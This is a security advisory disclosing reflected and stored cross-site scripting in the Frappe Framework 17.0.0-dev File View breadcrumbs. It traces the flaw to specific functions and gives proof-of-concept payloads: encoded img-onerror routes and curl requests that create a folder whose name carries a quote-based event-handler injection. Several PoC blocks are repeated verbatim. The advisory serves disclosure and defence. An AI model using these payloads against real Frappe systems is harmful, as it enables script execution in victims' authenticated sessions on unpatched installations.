Frappe Framework 17.0.0-dev - Reflected/Stored XSS in File View breadcrumbs rendering

Description

A Stored Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of user-controlled input in the File View breadcrumb renderer. Folder segments derived from the application route are interpolated into HTML templates by get_breadcrumbs_html() without output encoding.

The generated breadcrumb markup is subsequently inserted into the DOM by setup_no_result_area() through jQuery HTML parsing. An attacker can craft a malicious route containing HTML or JavaScript payloads that are rendered and executed when a victim accesses the affected File View page.

Vulnerability

Case A: reflected route-segment XSS in breadcrumbs

1. Source: attacker-controlled URL segments in File list route.

2. Propagation: frappe.get_route() -> get_breadcrumbs_html() -> folder title interpolation.

3. Sink: setup_no_result_area() inserts ${this.get_breadcrumbs_html()} using jQuery HTML string constructor and appends to DOM.

4. Impact: payload such as x"><img src=x onerror=...> executes when breadcrumb HTML is rendered.

Important routing behavior observed:

• set_breadcrumbs() mutates route with route.splice(-1), so payload is most reliable when placed before a trailing segment, e.g. /.../<payload>/TAIL.

Case B: stored breadcrumb attribute injection via folder name

1. Source persistence: File folder names can include quotes (") and are stored.

2. Server-side constraints: file naming blocks < and > but does not block quotes in this path.

3. Propagation: malicious folder name appears in non-last breadcrumb item and is interpolated into <a href="${route}">.

4. Sink behavior: quote breaks href attribute and injects event handler attributes (e.g., onmouseover=...) that execute on interaction.

Case C: header sink in get_header_html() / ListView.render_header()

1. get_header_html() embeds unescaped breadcrumbs_html in:

   • <span class="level-item">${breadcrumbs_html}</span>

2. ListView.render_header() inserts that HTML into the document via:

   • this.$result.prepend(this.get_header_html())

3. Runtime validation showed injected <img ... onerror=...> present in .list-row-head and JavaScript execution (executed_flag: true).

4. This confirms exploitability through both FileView sinks:

   • no-result area (setup_no_result_area)

   • list header rendering path (get_header_html -> render_header)

Relevant code:

• frappe/frappe/public/js/frappe/views/file/file_view.js:39-46

• frappe/frappe/public/js/frappe/views/file/file_view.js:59-62

• frappe/frappe/public/js/frappe/views/file/file_view.js:336-356

• frappe/frappe/public/js/frappe/views/file/file_view.js:360-389

• frappe/frappe/public/js/frappe/list/list_view.js:622-628

• frappe/frappe/model/naming.py:522-525

• frappe/frappe/core/doctype/file/file.py:439-448

PoC

Reflected route PoC

Open while authenticated in Desk:

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E/TAIL

Alternative non-dialog payload used for deterministic evidence:

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Ddocument.body.dataset.filexss_doc%3D1%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Ddocument.body.dataset.filexss_doc%3D1%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Ddocument.body.dataset.filexss_doc%3D1%3E/TAIL

http://localhost:18080/desk/List/File/Home/x%22%3E%3Cimg%20src%3Dx%20onerror%3Ddocument.body.dataset.filexss_doc%3D1%3E/TAIL

Expected result:

• Breadcrumb HTML contains injected <img ... onerror=...> and executes JavaScript.

Stored folder-name PoC

1. Create folder with quote-based payload:

PAYLOAD='Q" onmouseover="alert(1)'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.core.api.file.create_new_folder \
  --data-urlencode "file_name=${PAYLOAD}" \
  --data-urlencode "folder=Home"

PAYLOAD='Q" onmouseover="alert(1)'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.core.api.file.create_new_folder \
  --data-urlencode "file_name=${PAYLOAD}" \
  --data-urlencode "folder=Home"

PAYLOAD='Q" onmouseover="alert(1)'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.core.api.file.create_new_folder \
  --data-urlencode "file_name=${PAYLOAD}" \
  --data-urlencode "folder=Home"

PAYLOAD='Q" onmouseover="alert(1)'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.core.api.file.create_new_folder \
  --data-urlencode "file_name=${PAYLOAD}" \
  --data-urlencode "folder=Home"

2. Create nested subfolders under the payload folder and open a deep route so payload folder appears as a non-last breadcrumb item.

3. Hover the malicious breadcrumb anchor to trigger the handler.

Evidence of Exploitation

• Video of exploitation:

  

Our security policy

We have reserved the ID CVE-2026-50704 to refer to this issue from now on.

System Information

• Frappe Framework

• Version 17.0.0-dev

• Operating System: Any

References

• Github Repository: https://github.com/frappe/frappe

• Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.